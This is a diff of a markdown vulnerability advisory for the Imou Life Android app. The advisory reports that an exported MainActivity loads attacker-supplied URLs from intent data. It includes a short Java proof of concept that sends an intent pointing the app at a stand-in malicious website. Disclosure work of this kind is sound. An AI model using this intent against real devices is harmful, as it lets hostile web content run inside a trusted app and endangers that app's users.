actuator/imou/imou-life-6.8.0.md

 ### Vulnerability Description:

 The `com.mm.android.easy4ip.MainActivity` activity in the `com.mm.android.smartlifeiot` app allows for the loading of URLs directly from intent data.
-This can be potentially exploited by a malicious third-party app to force this activity to load malicious web content from a URL specified by the attacker.
+This can be  exploited by a malicious third-party app to force this activity to load malicious web content from a URL specified by the attacker.

 ### Proof of Concept:

 A third-party malicious app (`com.example.d3m0`) can craft and launch an intent targeting `com.mm.android.easy4ip.MainActivity` as follows:

 <code>
-java
 Intent intent = new Intent();
 intent.setComponent(new ComponentName("com.mm.android.smartlifeiot", "com.mm.android.easy4ip.MainActivity"));
 intent.putExtra("url", "imoulife://http://maliciouswebsitetest.com");